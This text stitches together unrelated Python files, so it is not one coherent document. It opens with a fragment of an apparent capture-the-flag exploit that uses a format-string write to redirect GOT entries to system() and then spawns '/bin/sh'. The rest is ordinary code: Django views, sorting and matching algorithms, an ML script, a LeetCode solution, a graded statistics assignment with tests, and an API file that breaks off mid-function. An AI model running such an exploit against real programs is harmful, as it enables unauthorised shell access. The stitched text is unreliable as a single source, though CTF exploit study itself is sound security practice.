# break *0x400b0a
# c
# ''')
# Menu navigation before the vulnerable input is reached.
r.sendline("4")
r.sendline("3")
r.recvuntil("below:")
# that's 0x602048 to 0x4009fa and 0x602058 to 0x4006e0
STRCMP = 0x602058        # GOT slot rewritten to SYSTEM_PLT (presumably strcmp)
PRINTF = 0x602048        # GOT slot rewritten to the view-team gadget
SYSTEM_PLT = 0x4006e0
VIEW_TEAM = 0x400993
VIEW_TEAM_OFF = 0x4009fa
# Format-string write: three padded %n/%hn conversions perform the partial
# overwrites; the pointers they dereference (%30$..%32$) follow as the
# three packed addresses appended below.
payload = ''
payload += "%57x%30$n".rjust(16)
payload += "%1692x%31$hn".rjust(16)
payload += "%789x%32$hn".rjust(16)
payload += p64(PRINTF + 2)
payload += p64(STRCMP)
payload += p64(PRINTF)
r.sendline(payload)
# Input that ends up passed to system() once the GOT is redirected.
r.sendline("/bin/sh")
# r.sendline("cat flag.txt")
r.interactive()
|
def check_number_exists(text):
    """Return True if *text* contains at least one numeric character.

    The parameter was renamed from ``str``, which shadowed the builtin.
    """
    # any() short-circuits on the first digit, exactly like the original loop.
    return any(c.isnumeric() for c in text)
def check_letter_exists(text):
    """Return True if *text* contains at least one alphabetic character.

    The parameter was renamed from ``str``, which shadowed the builtin.
    """
    # any() short-circuits on the first letter, exactly like the original loop.
    return any(c.isalpha() for c in text)
def main():
    """Prompt for a password and report which strength rules it violates.

    Rules: at least 8 characters, contains a digit, contains a letter.
    All three must pass for the password to be accepted.
    """
    pwd = input("请输入密码:")
    # (passed?, complaint to print when the rule fails)
    rules = [
        (len(pwd) >= 8, '密码长度要求至少8位!'),
        (check_number_exists(pwd), '密码中必须包含数字!'),
        (check_letter_exists(pwd), '密码中必须包含字母!'),
    ]
    score = 0
    for passed, complaint in rules:
        if passed:
            score += 1
        else:
            print(complaint)
    if score == 3:
        print('恭喜,您的密码符合规范!')


if __name__ == '__main__':
    main()
|
from django.shortcuts import render , redirect
from django.contrib.auth import authenticate , login, logout , update_session_auth_hash
from django.contrib import messages
from .forms import UserRegisterForm , UserAuthenticationForm, UserChangeForm
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth.decorators import login_required
# # Create your views here.
def home(request):
    """Render the landing page."""
    return render(request, 'user_profile/home.html')
def register(request):
    """Register a new account, log the user in, and redirect home.

    On invalid POST data the bound form (with errors) is re-rendered;
    on GET a fresh form is shown.
    """
    if (request.method == "POST"):
        form = UserRegisterForm(request.POST)
        if form.is_valid():
            form.save()
            email = form.cleaned_data.get("email")
            rawpassword = form.cleaned_data.get('password1')
            # Re-authenticate with the just-saved credentials so login()
            # receives a backend-annotated user object.
            # NOTE(review): if authenticate() returns None (e.g. backend
            # mismatch), login() will raise -- confirm backend config.
            user = authenticate(request, email=email, password=rawpassword)
            login(request, user)
            messages.success(request, f"Account created for {email}")
            return redirect('home_page')
        else:
            return render(request, 'user_profile/register.html', {'form': form})
    form = UserRegisterForm()
    return render(request, 'user_profile/register.html', {'form': form})
def login_view(request):
    """Authenticate a user by email/password and start their session.

    Falls through to re-render the login page when the form is invalid
    or the credentials are wrong (an error message is flashed).
    """
    if request.method == "POST":
        login_form = UserAuthenticationForm(request.POST)
        if login_form.is_valid():
            email = request.POST["email"]
            password = request.POST["password"]
            user = authenticate(request, email=email, password=password)
            if user:
                login(request, user=user)
                messages.info(request, f"Hello {email} ")
                return redirect('home_page')
            else:
                messages.error(request, f"Invalid Login")
    else:
        login_form = UserAuthenticationForm()
    return render(request, 'user_profile/login.html', {"login_form": login_form})
def logout_view(request):
    """End the current session and send the visitor back home."""
    logout(request)
    return redirect('home_page')
@login_required(login_url='login')
def edit_profile(request):
    """Let the logged-in user edit their own account details.

    Uses the project's UserChangeForm (imported from .forms). On an
    invalid POST the bound form falls through and is re-rendered.
    """
    if request.method == "POST":
        form = UserChangeForm(request.POST, instance=request.user)
        if form.is_valid():
            form.save()
            return redirect('home_page')
    else:
        form = UserChangeForm(instance=request.user)
    return render(request, 'user_profile/edit_profile.html', {'form': form})
@login_required(login_url="login")
def apply(request):
    """Render the application page (requires login)."""
    return render(request, 'user_profile/apply.html', {})
@login_required(login_url="login")
def update_password(request):
    """Change the current user's password without logging them out."""
    if request.method == "POST":
        form = PasswordChangeForm(data=request.POST, user=request.user)
        if form.is_valid():
            form.save()
            # Rotate the session auth hash so the password change does
            # not invalidate the current session.
            update_session_auth_hash(request, form.user)
            return redirect('home_page')
    else:
        form = PasswordChangeForm(user=request.user)
    return render(request, 'user_profile/edit_password.html', {"form": form})
|
#!/usr/bin/env python
# coding: utf-8
# In[3]:
#Gale-Shapley Algorithm
#Created by: Naol Legesse
#Date: September 23/2020
#Purpose: To generate a stable matching for given items or people and their preferance
#Input : N number of male and N number of female participants with their respective preferances
#Output : a stable matching that couples the male and female participants based on their preferance
#Examples: This algorithim can be used in various selection processes and one is given below.
import time
import random
import sys
# This class is used to Implement the Gale-shapley Algrothim.
class Stable_Matching:
    """Gale-Shapley stable matching between n men and n women.

    Men and women are both identified by the integers 0..n-1; each side
    holds a preference list over the other side (lower index = preferred).

    Fixes over the original:
      * an engagement for woman w is found with ``pair[1] == w`` instead of
        ``w in pair`` (which also matched a *man* with the same id);
      * a displaced fiance is returned to Free_men (previously he stayed
        unmatched forever);
      * Free_men is iterated over a snapshot, since create_match mutates it.
    """

    def __init__(self):
        self.Temporary_man = dict()    # man id -> his preference list of women
        self.Temporary_woman = dict()  # woman id -> her preference list of men
        self.Engaged = []              # current [man, woman] engagements
        self.Free_men = []             # men without a partner; they propose
        self.Married = []              # scratch: engagements of one woman

    def create_match(self, man):
        """Let *man* propose down his preference list until he is engaged
        or every woman on his list has (for now) rejected him."""
        for w in self.Temporary_man[man]:
            # Engagements involving woman w (0 or 1 pairs; women sit at index 1).
            self.Married = [pair for pair in self.Engaged if pair[1] == w]
            if len(self.Married) == 0:
                # w is free: engage the pair provisionally.
                self.Engaged.append([man, w])
                self.Free_men.remove(man)
                return
            # w already has a fiance: compare the two suitors by her
            # preference index (smaller index = more preferred).
            Previous_male_partner = self.Married[0][0]
            new_man_index = self.Temporary_woman[w].index(man)
            Current_fiance = self.Temporary_woman[w].index(Previous_male_partner)
            if new_man_index < Current_fiance:
                # w trades up: the proposer takes the engagement ...
                self.Free_men.remove(man)
                self.Married[0][0] = man
                # ... and the displaced fiance becomes single again.
                self.Free_men.append(Previous_male_partner)
                return

    def main(self, argv):
        """Build random preference lists of size int(sys.argv[1]), run the
        matching, and print ``argv elapsed_seconds``."""
        n = int(sys.argv[1])
        for i in range(0, n):
            self.Temporary_man[i] = list(range(0, n))
            random.shuffle(self.Temporary_man[i])
        for j in range(0, n):
            self.Temporary_woman[j] = list(range(0, n))
            random.shuffle(self.Temporary_woman[j])
        for m in self.Temporary_man.keys():
            self.Free_men.append(m)
        # Run the actual matching, timing it.
        t = time.time()
        while (len(self.Free_men) > 0):
            # Snapshot: create_match removes from / appends to Free_men.
            for man in list(self.Free_men):
                self.create_match(man)
        print('{} {}'.format(argv, time.time() - t))
if __name__ == '__main__':
    # Requires one command-line argument: the number of men/women per side.
    Stable_Matching().main(sys.argv[1])
# In[ ]:
|
'''
插入排序
1. 将第一待排序序列第一个元素看做一个有序序列,把第二个元素到最后一个元素当成是未排序序列。
2. 从头到尾依次扫描未排序序列,将扫描到的每个元素插入有序序列的适当位置。(如果待插入的元素与有序序列中的某个元素相等,则将待插入元素插入到相等元素的后面。)
'''
def insertionSort(arr):
    """Sort *arr* in place with insertion sort and return the same list.

    Stable: equal elements keep their relative order. O(n^2) worst case.
    """
    # Element 0 is trivially a sorted prefix, so start at index 1
    # (the original also ran i = 0, a wasted no-op pass).
    for i in range(1, len(arr)):
        current = arr[i]
        preIndex = i - 1
        # Shift larger elements of the sorted prefix one slot right.
        while preIndex >= 0 and arr[preIndex] > current:
            arr[preIndex + 1] = arr[preIndex]
            preIndex -= 1
        arr[preIndex + 1] = current
    return arr
arr = [17, 3, 2, 7, 5, 15, 4, 9, 8]
arr_sort = insertionSort(arr)
print(arr_sort) |
"""
Collection of MXNet random functions, wrapped to fit Ivy syntax and signature.
"""
# global
import mxnet as _mx
# local
# noinspection PyProtectedMember
from ivy.mxnd.core.general import _mxnet_init_context
# noinspection PyProtectedMember
from ivy.mxnd.core.general import _1_dim_array_to_flat_array
def random_uniform(low=0., high=1., shape=None, dev_str='cpu'):
    """Draw uniform random samples between *low* and *high*.

    :param low: lower bound; a scalar or a 0-dim NDArray (unwrapped via asscalar).
    :param high: upper bound; a scalar or a 0-dim NDArray.
    :param shape: output shape; None or () yields a flat 0-dim array.
    :param dev_str: ivy device string, mapped to an MXNet context.
    """
    if isinstance(low, _mx.nd.NDArray):
        low = low.asscalar()
    if isinstance(high, _mx.nd.NDArray):
        high = high.asscalar()
    ctx = _mxnet_init_context(dev_str)
    if shape is None or len(shape) == 0:
        # Sample a single element and flatten it, since MXNet cannot
        # produce a 0-dim array directly.
        return _1_dim_array_to_flat_array(_mx.nd.random.uniform(low, high, (1,), ctx=ctx))
    return _mx.nd.random.uniform(low, high, shape, ctx=ctx)
def multinomial(probs, num_samples):
    """Draw *num_samples* category indices from (possibly unnormalized)
    probabilities *probs*; rows are normalized to sum to 1 first."""
    probs = probs / _mx.nd.sum(probs, -1, True)
    return _mx.nd.sample_multinomial(probs, (num_samples,))
def randint(low, high, shape, dev_str='cpu'):
    """Draw random integers between *low* and *high*.

    :param low: lower bound; a scalar or a 0-dim NDArray (coerced to int).
    :param high: upper bound; a scalar or a 0-dim NDArray (coerced to int).
    :param shape: output shape; () yields a flat 0-dim array.
    :param dev_str: ivy device string, mapped to an MXNet context.
    """
    if isinstance(low, _mx.nd.NDArray):
        low = int(low.asscalar())
    if isinstance(high, _mx.nd.NDArray):
        high = int(high.asscalar())
    ctx = _mxnet_init_context(dev_str)
    if len(shape) == 0:
        # Sample a single element and flatten it, since MXNet cannot
        # produce a 0-dim array directly.
        return _1_dim_array_to_flat_array(_mx.nd.random.randint(
            low, high, (1,), ctx=ctx))
    return _mx.nd.random.randint(low, high, shape, ctx=ctx)
def seed(seed_value=0):
    """Seed MXNet's global random number generator (PEP 8: prefer ``def``
    over assigning a lambda to a name)."""
    return _mx.random.seed(seed_value)


def shuffle(x):
    """Randomly shuffle NDArray *x* via MXNet's random shuffle op."""
    return _mx.nd.random.shuffle(x)
|
# print("Enter Row value:", end=" ")
for row in range(4):
for column in range(8):
if (column==0 or column==7) or (column==1 and row!=3) or (column==2 and row<2) or (column==6 and row<3) or (column==5 and row<2) or ((column==3 or column==4) and row==0):
print ("*", end="")
else:
print("",end=" ")
print() |
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth.models import User
# Create your views here.
def signup(request):
    """Display the signup page."""
    return render(request, 'signup.html')
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 20 14:13:51 2014
@author: ogavril
"""
import os
import numpy as np
import pandas as pd
import neuralnet
import functions
def initialize_train_data(DATA_DIR, fn):
    """Load the training CSV at DATA_DIR + fn into a DataFrame.

    Possible extensions: filling NaNs, trimming, outlier handling,
    transforming, etc.
    """
    return pd.read_csv(DATA_DIR + fn)
def initialize_test_data(DATA_DIR, fn):
    """Load the test CSV at DATA_DIR + fn into a DataFrame.

    Usually differs from train data as there is no target column.
    Possible extensions: filling NaNs, trimming, outlier handling,
    transforming, etc.
    """
    return pd.read_csv(DATA_DIR + fn)
def valid_variables(df, target_var):
    """Return the explanatory column names of *df*, i.e. every column
    except the cross-validation marker "_TRAIN" and the target column."""
    excluded = {"_TRAIN", target_var}
    return [col for col in df.columns if col not in excluded]
if __name__== "__main__":
    # Load in the data (Python 2 script: note the print statements below).
    DATA_DIR = ".."+os.sep+"data"+os.sep
    train_fn = "test07_SquarePlusItself.csv"  # alternatives: test01.csv, test02_logNexp.csv, test03.csv, test03_random.csv, test04.csv, test05.csv, test06_Square_plus_random.csv, test07_Square.csv
    #observations,target,df = initialize_data(DATA_DIR,train_fn)
    train_df = initialize_train_data(DATA_DIR,train_fn)
    target_var = "response"
    """organize data into train, test,and vaildate"""
    train_var = "_TRAIN"
    # Fold layout: presumably folds 0..3 train, fold 4 validates, and -1
    # marks the held-out test set -- confirm against def_cross_validation_subsets.
    validation_set = 4
    test_set = -1#validation_set +1
    train_df = functions.def_cross_validation_subsets(train_df,train_var,numK=validation_set+1)
    test_df = train_df[train_df[train_var] == test_set]
    train_df = train_df[train_df[train_var] != test_set]
    test_df[train_var] = test_set
    """put the two DFs together to perform transformations, trimming, filling NANs if necessary etc."""
    DF = pd.concat([train_df, test_df], ignore_index=False)
    DF['const'] = 1.0 #adding the bias node; in some situations it should be omitted
    print "size of concatenated DF",len(DF),"number of columns:", len(DF.columns)
    explanatory_vars = valid_variables(train_df,target_var)
    if 'const' in DF.columns:
        explanatory_vars += ['const']
    print "useful vars:",explanatory_vars
    # Scale all explanatory columns (and the target) before training.
    scaled_DF = DF.copy()
    for col in explanatory_vars:
        scaled_DF[col] = functions.scale(DF,col)
    #scaled_DF.to_csv("scaledDF.csv")
    scaled_DF[target_var] = functions.scale(DF,target_var)
    """separate the two DFs AFTER all the variable manipulating work is done"""
    train_df = scaled_DF[scaled_DF[train_var] != test_set ]
    test_df = scaled_DF[scaled_DF[train_var] == test_set]
    # Hold the validation fold out of the training matrices.
    train_data = functions.make_numpy_matrix(train_df[train_df[train_var] != validation_set],explanatory_vars)
    train_target = np.array(train_df[target_var][train_df[train_var] != validation_set])#.reshape(train_data.shape[0],1)
    validation_data = functions.make_numpy_matrix(train_df[train_df[train_var] == validation_set],explanatory_vars)
    validation_target = np.array(train_df[target_var][train_df[train_var] == validation_set])#.reshape(validation_data.shape[0],1)
    # Network hyper-parameters.
    hdn = train_data.shape[1]+2
    numEpochs = 200
    lr = 0.05
    linNeuron = True
    neural_net = neuralnet.SimpleNeuralNet(train_data.shape[1],num_hidden_neurons=hdn,
                                           num_epochs=numEpochs,LearningRate=lr,include_LinearNeuron = linNeuron,
                                           include_InputBias=True,include_OutputBias=True)
    net = neural_net.train(train_data,train_target,plot=True)
    print "weights_HO:",net.weights_HO
    print "weights_HI:",net.weights_IH
    # Report fit quality on both the training and the validation folds.
    predicted_values_train,RMSE_train = neural_net.validate(train_data,train_target)
    predicted_values_validation,RMSE_validation= neural_net.validate(validation_data,validation_target)
|
# -*- coding:utf-8 -*-
from django.shortcuts import render_to_response,HttpResponseRedirect
from django.http import HttpResponse,Http404,HttpResponseRedirect
from public_tool import user,tools
from http_tool.models import HttpSend
from .models import ProjectInfo
def project_create(request):
    """Create a ProjectInfo row from the submitted form and redirect to
    the project list; on GET just render the creation form.

    NOTE(review): assumes request.session['username'] is set (raises
    KeyError for anonymous users) -- confirm the login middleware/flow.
    """
    username = request.session['username']
    user_id = user.getuserid(username)
    if request.method == 'POST' :
        project_name = request.POST.get('project_name')
        # Normalize the raw form timestamps via the shared time helper.
        start_time = tools.time_conctrol(request.POST.get('start_time'))
        smock_time = tools.time_conctrol(request.POST.get('smock_time'))
        online_time = tools.time_conctrol(request.POST.get('online_time'))
        participant = request.POST.get('participant')
        project_manager = request.POST.get('project_manager')
        try:
            # Insert the form data into the ProjectInfo table.
            ProjectInfo.objects.create(project_name = project_name , start_time = start_time ,smock_time = smock_time, online_time = online_time,participant =participant ,user_id = user_id,project_manager=project_manager )
            # On success, redirect to the list page.
            return HttpResponseRedirect('/project/list/')
        except Exception , e :
            # TODO: add proper logging here.
            # Insert failed: surface the error to the caller.
            return HttpResponse(e)
    return render_to_response('project_control/project_process_create.html',{'username':username})
def project_list(request):
    """Render the project list belonging to the logged-in user.

    NOTE(review): when user_id is falsy this function falls through and
    implicitly returns None, which Django rejects -- confirm whether that
    path can actually occur.
    """
    username = request.session['username']
    user_id = user.getuserid(username)
    if user_id :
        project_list = list(ProjectInfo.objects.filter(user_id = user_id).values("project_name","start_time","smock_time","online_time","participant","project_manager","current_phase"))
        return render_to_response('project_control/project_process_list.html',{'project_list':project_list,'username':username})
def get_edit(request,id):
    """Placeholder edit view.

    NOTE(review): renders the generic list template and passes the row id
    under the 'username' key -- presumably a stub awaiting implementation.
    """
    return render_to_response('http_tool/get_list.html', {'username': id})
def get_detail(request,id):
    """Placeholder detail view.

    NOTE(review): identical to get_edit; passes the row id under the
    'username' key -- presumably a stub awaiting implementation.
    """
    return render_to_response('http_tool/get_list.html',{'username':id})
def get_delete(request,id):
    """Delete the HttpSend row with the given id.

    NOTE(review): afterwards this *calls* project_create (re-rendering the
    creation page) instead of redirecting -- confirm this is intended.
    """
    HttpSend.objects.filter(id=id).delete()
    return project_create(request)
|
"""
给你二叉搜索树的根节点 root ,该树中的两个节点被错误地交换。请在不改变其结构的情况下,恢复这棵树。
进阶:使用 O(n) 空间复杂度的解法很容易实现。你能想出一个只使用常数空间的解决方案吗?
示例 1:
输入:root = [1,3,null,null,2]
输出:[3,1,null,null,2]
解释:3 不能是 1 左孩子,因为 3 > 1 。交换 1 和 3 使二叉搜索树有效。
示例 2:
输入:root = [3,1,4,null,null,2]
输出:[2,1,4,null,null,3]
解释:2 不能在 3 的右子树中,因为 2 < 3 。交换 2 和 3 使二叉搜索树有效。
提示:
树上节点的数目在范围 [2, 1000] 内
-231 <= Node.val <= 231 - 1
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/recover-binary-search-tree
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
# 注释掉的部分是空间复杂度O(N)的做法
# 核心思想是二叉搜索树的中序遍历一定是有序的,所以在这样的序列中寻找异常节点进行节点的值的交换
# 之所以能够做到O(1)的空间复杂度是因为中序遍历可以是隐式地,没有必要保存一整个序列,只要知道遍历的时候每个节点的前一个节点是什么就可以发现异常节点了。
class Solution:
    """Recover a BST in which exactly two nodes' values were swapped.

    An inorder traversal of a valid BST is non-decreasing, so walking the
    tree inorder while remembering the previously visited node exposes the
    swapped nodes as "inversions" where prev.val > node.val. Because only
    the previous node is carried along (no full inorder list is stored),
    extra space is O(h) recursion stack rather than O(n).

    Note: the original annotated parameters with ``TreeNode``/``List``
    without importing them, which raised NameError at class definition
    time; the annotations were removed.
    """

    def dfs(self, root, pre, q):
        """Inorder walk collecting inversion pairs.

        :param root: current subtree root (a TreeNode-like object with
            .val/.left/.right)
        :param pre: node visited immediately before *root* in inorder
            order, or None at the start
        :param q: list accumulating (prev, node) inversion pairs
        :return: tuple (q, last node visited in this subtree)
        """
        if root.left:
            q, pre = self.dfs(root.left, pre, q)
        if pre and pre.val > root.val:
            q.append((pre, root))
        pre = root
        if root.right:
            q, pre = self.dfs(root.right, pre, q)
        return q, pre

    def recoverTree(self, root) -> None:
        """Fix the tree in place; do not return anything.

        One inversion  -> the swapped nodes are inorder-adjacent: swap them.
        Two inversions -> swap the first pair's left node with the second
        pair's right node.
        """
        q, _ = self.dfs(root, None, [])
        first = q[0][0]
        second = q[0][1] if len(q) == 1 else q[1][1]
        first.val, second.val = second.val, first.val
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Oriëntatie op AI
Practicum 3: statistiek
(c) 2019 Hogeschool Utrecht
Bart van Eijkelenburg (bart.vaneijkelenburg@hu.nl)
Tijmen Muller (tijmen.muller@hu.nl)
Opdracht:
Werk onderstaande functies uit. Elke functie krijgt een niet-lege en
ongesorteerde lijst *lst* met gehele getallen (int) als argument.
Voeg commentaar toe om je code toe te lichten.
Je kunt je functies testen met het gegeven raamwerk door het bestand
uit te voeren (of met behulp van pytest, als je weet hoe dat werkt).
Lever je werk in op Canvas als alle tests slagen.
Let op! Het is niet toegestaan om bestaande modules te importeren en te
gebruiken, zoals `math` en `statistics`.
"""
# Vul hier je naam, klas en studentnummer in
naam = ""
klas = ""
studentnummer = -1
def mean(lst):
    """Return the arithmetic mean (float) of the non-empty list lst."""
    # True division always yields a float in Python 3; no imports needed
    # (the assignment forbids math/statistics).
    return sum(lst) / len(lst)
def rnge(lst):
    """Return the range (int) of the list lst: maximum minus minimum."""
    return max(lst) - min(lst)
def median(lst):
    """Return the median (float) of the non-empty list lst."""
    ordered = sorted(lst)
    n = len(ordered)
    mid = n // 2
    if n % 2 == 1:
        return float(ordered[mid])
    # Even length: average the two middle values (true division -> float).
    return (ordered[mid - 1] + ordered[mid]) / 2
def q1(lst):
    """Return the first quartile Q1 (float) of the list lst.

    Q1 is the median of the lower half of the sorted data; for odd-length
    lists the overall median itself is excluded from that half.
    (Self-contained rather than calling median(), so it stands alone.)
    """
    ordered = sorted(lst)
    lower = ordered[:len(ordered) // 2]
    n = len(lower)
    if n % 2 == 1:
        return float(lower[n // 2])
    return (lower[n // 2 - 1] + lower[n // 2]) / 2
def q3(lst):
    """Return the third quartile Q3 (float) of the list lst.

    Q3 is the median of the upper half of the sorted data; for odd-length
    lists the overall median itself is excluded from that half.
    """
    ordered = sorted(lst)
    upper = ordered[(len(ordered) + 1) // 2:]
    n = len(upper)
    if n % 2 == 1:
        return float(upper[n // 2])
    return (upper[n // 2 - 1] + upper[n // 2]) / 2
def var(lst):
    """Return the population variance (float) of the non-empty list lst."""
    m = sum(lst) / len(lst)
    # Mean of the squared deviations from the mean.
    return sum((x - m) ** 2 for x in lst) / len(lst)
def std(lst):
    """Return the population standard deviation (float) of lst."""
    m = sum(lst) / len(lst)
    # Square root via ** 0.5, since importing math is not allowed.
    return (sum((x - m) ** 2 for x in lst) / len(lst)) ** 0.5
def freq(lst):
    """Return a dict mapping each value in lst to its number of occurrences.

    Examples:
        >> freq([0, 0, 4, 5])
        {0: 2, 4: 1, 5: 1}
    """
    freqs = dict()
    for value in lst:
        # dict.get with default 0 avoids a membership pre-check.
        freqs[value] = freqs.get(value, 0) + 1
    return freqs
def modes(lst):
    """Return a sorted list of the mode(s) of lst: every value whose
    frequency equals the maximum frequency.

    (Counts inline rather than calling freq(), so the function stands alone.)
    """
    counts = dict()
    for value in lst:
        counts[value] = counts.get(value, 0) + 1
    top = max(counts.values())
    modi = [value for value, c in counts.items() if c == top]
    return sorted(modi)
"""
==========================[ HU TESTRAAMWERK ]================================
Onderstaand staan de tests voor je code -- hieronder mag je niets wijzigen!
Je kunt je code testen door deze file te runnen of met behulp van pytest.
"""
def my_assert_args(function, args, expected_output, check_type=True):
"""
Controleer of gegeven functie met gegeven argumenten het verwachte resultaat oplevert.
Optioneel wordt ook het return-type gecontroleerd.
"""
argstr = str(args).replace(',)', ')')
output = function(*args)
# Controleer eerst het return-type (optioneel)
if check_type:
msg = f"Fout: {function.__name__}{argstr} geeft geen {type(expected_output)} terug als return-type"
assert type(output) is type(expected_output), msg
# Controleer of de functie-uitvoer overeenkomt met de gewenste uitvoer
msg = f"Fout: {function.__name__}{argstr} geeft {output} in plaats van {expected_output}"
if type(expected_output) is float:
# Vergelijk bij float als return-type op 7 decimalen om afrondingsfouten te omzeilen
assert round(output - expected_output, 7) == 0, msg
else:
assert output == expected_output, msg
def test_id():
assert naam != "", "Je moet je naam nog invullen!"
assert studentnummer != -1, "Je moet je studentnummer nog invullen!"
assert klas != "", "Je moet je klas nog invullen!"
def test_mean():
testcases = [
(([4, 2, 5, 8, 6],), 5.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 3.0)
]
for case in testcases:
my_assert_args(mean, case[0], case[1])
def test_mean_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(mean, (lst_test,), statistics.mean(lst_test), False)
def test_rnge():
testcases = [
(([4, 2, 5, 8, 6],), 6),
(([1, 3, 2, 4, 6, 2, 4, 2],), 5)
]
for case in testcases:
my_assert_args(rnge, case[0], case[1])
def test_median():
testcases = [
(([4, 2, 5, 8, 6],), 5.0),
(([1, 3, 4, 6, 4, 2],), 3.5),
(([1, 3, 4, 6, 2, 4, 2],), 3.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 2.5)
]
for case in testcases:
my_assert_args(median, case[0], case[1])
def test_median_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(median, (lst_test,), statistics.median(lst_test), False)
def test_q1():
testcases = [
(([4, 2, 5, 8, 6],), 3.0),
(([1, 3, 4, 6, 4, 2],), 2.0),
(([1, 3, 5, 6, 1, 4, 2],), 1.0),
(([5, 7, 4, 4, 6, 2, 8],), 4.0),
(([0, 5, 5, 6, 7, 7, 12],), 5.0),
(([1, 3, 3, 5, 6, 2, 4, 1],), 1.5),
(([3, 5, 7, 8, 9, 11, 15, 16, 20, 21],), 7.0),
(([1, 2, 5, 6, 7, 9, 12, 15, 18, 19, 27],), 5.0)
]
for case in testcases:
my_assert_args(q1, case[0], case[1])
def test_q3():
testcases = [
(([4, 2, 5, 8, 6],), 7.0),
(([1, 3, 4, 6, 4, 2],), 4.0),
(([1, 3, 5, 6, 2, 4, 1],), 5.0),
(([5, 7, 4, 4, 6, 2, 8],), 7.0),
(([0, 5, 5, 6, 7, 7, 12],), 7.0),
(([1, 3, 3, 5, 6, 2, 4, 1],), 4.5),
(([1, 3, 3, 5, 6, 2, 4, 1],), 4.5),
(([3, 5, 7, 8, 9, 11, 15, 16, 20, 21],), 16.0),
(([1, 2, 5, 6, 7, 9, 12, 15, 18, 19, 27],), 18.0)
]
for case in testcases:
my_assert_args(q3, case[0], case[1])
def test_var():
testcases = [
(([4, 2, 5, 8, 6],), 4.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 2.25)
]
for case in testcases:
my_assert_args(var, case[0], case[1])
def test_var_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(var, (lst_test,), statistics.pvariance(lst_test), False)
def test_std():
testcases = [
(([4, 2, 5, 8, 6],), 2.0),
(([1, 3, 2, 4, 6, 2, 4, 2],), 1.5)
]
for case in testcases:
my_assert_args(std, case[0], case[1])
def test_std_simulated():
import random
import statistics
for lst_size in range(1, 11):
lst_test = [random.choice(range(5)) for _ in range(lst_size)]
my_assert_args(std, (lst_test,), statistics.pstdev(lst_test), False)
def test_freq():
testcases = [
(([4, 2, 5, 8, 6],), {2: 1, 4: 1, 5: 1, 6: 1, 8: 1}),
(([1, 3, 4, 6, 4, 2],), {1: 1, 2: 1, 3: 1, 4: 2, 6: 1}),
(([1, 3, 5, 6, 2, 4, 1],), {1: 2, 2: 1, 3: 1, 4: 1, 5: 1, 6: 1}),
(([1, 3, 3, 5, 6, 2, 4, 1],), {1: 2, 2: 1, 3: 2, 4: 1, 5: 1, 6: 1})
]
for case in testcases:
my_assert_args(freq, case[0], case[1])
def test_modes():
testcases = [
(([4, 2, 5, 8, 6],), [2, 4, 5, 6, 8]),
(([1, 3, 4, 6, 4, 2],), [4]),
(([1, 3, 4, 6, 2, 4, 2],), [2, 4]),
(([1, 3, 2, 4, 6, 2, 4, 2],), [2])
]
for case in testcases:
my_assert_args(modes, case[0], case[1])
def main():
try:
print("\x1b[0;32m")
test_id()
test_mean()
test_mean_simulated()
print("Je functie mean(lst) werkt goed!")
test_rnge()
print("Je functie rnge(lst) werkt goed!")
test_median()
test_median_simulated()
print("Je functie median(lst) werkt goed!")
test_q1()
print("Je functie q1(lst) werkt goed!")
test_q3()
print("Je functie q3(lst) werkt goed!")
test_var()
test_var_simulated()
print("Je functie var(lst) werkt goed!")
test_std()
test_std_simulated()
print("Je functie std(lst) werkt goed!")
test_freq()
print("Je functie freq(lst) werkt goed!")
test_modes()
print("Je functie modes(lst) werkt goed!")
print("\nGefeliciteerd, alles lijkt te werken!")
print("Lever je werk nu in op Canvas...")
def hist(freqs):
v_min = min(freqs.keys())
v_max = max(freqs.keys())
histo = str()
for i in range(v_min, v_max + 1):
histo += "{:5d} ".format(i)
if i in freqs.keys():
histo += "█" * freqs[i]
histo += '\n'
return histo
print("\x1b[0;30m")
s = input("Geef een reeks van gehele getallen (gescheiden door een spatie): ")
userlst = [int(c) for c in s.split()]
print("\nHet gemiddelde is {:.2f}".format(mean(userlst)))
print("De modi zijn {}".format(modes(userlst)))
print("De mediaan is {:.2f}".format(median(userlst)))
print("Q1 is {:.2f}".format(q1(userlst)))
print("Q3 is {:.2f}".format(q3(userlst)))
print("Het bereik is {}".format(rnge(userlst)))
print("De variantie is {:.2f}".format(var(userlst)))
print("De standaardafwijking is {:.2f}".format(std(userlst)))
print("\nHistogram (gekanteld):\n\n" + hist(freq(userlst)))
except AssertionError as ae:
print("\x1b[0;31m")
print(ae)
if __name__ == '__main__':
main()
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status, generics, filters
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.permissions import IsAdminUser, AllowAny
from .serializers import UserSerializer, ProfileSerializer
from .models import User, Profile, Profile
class UserAPI(APIView):
    """
    API to create a user or get all users.

    Open to unauthenticated callers (AllowAny): POST effectively acts as
    a public registration endpoint.
    """
    permission_classes = [AllowAny]

    def get(self, request, format=None):
        # List every user in the system (no pagination or filtering).
        users = User.objects.all()
        serializer = UserSerializer(users, many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        # Create the user and an empty linked Profile row in one request.
        serializer = UserSerializer(data=request.data)
        if serializer.is_valid():
            user = serializer.save()
            Profile.objects.create(user=user)
            return Response(serializer.data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class OrganizationAPI(APIView):
    """Placeholder endpoint; currently echoes a fixed payload."""

    def get(self, request, format=None):
        # NOTE(review): debug print left in; remove before production.
        print(request.data)
        return Response({"test": "test"})
class ProfileAPI(APIView):
    """Retrieve (by ?user_id=...) or update a user's Profile."""

    def get(self, request, format=None):
        # NOTE(review): Profile.objects.get raises DoesNotExist (-> 500)
        # when user_id is missing or unknown; consider returning a 404.
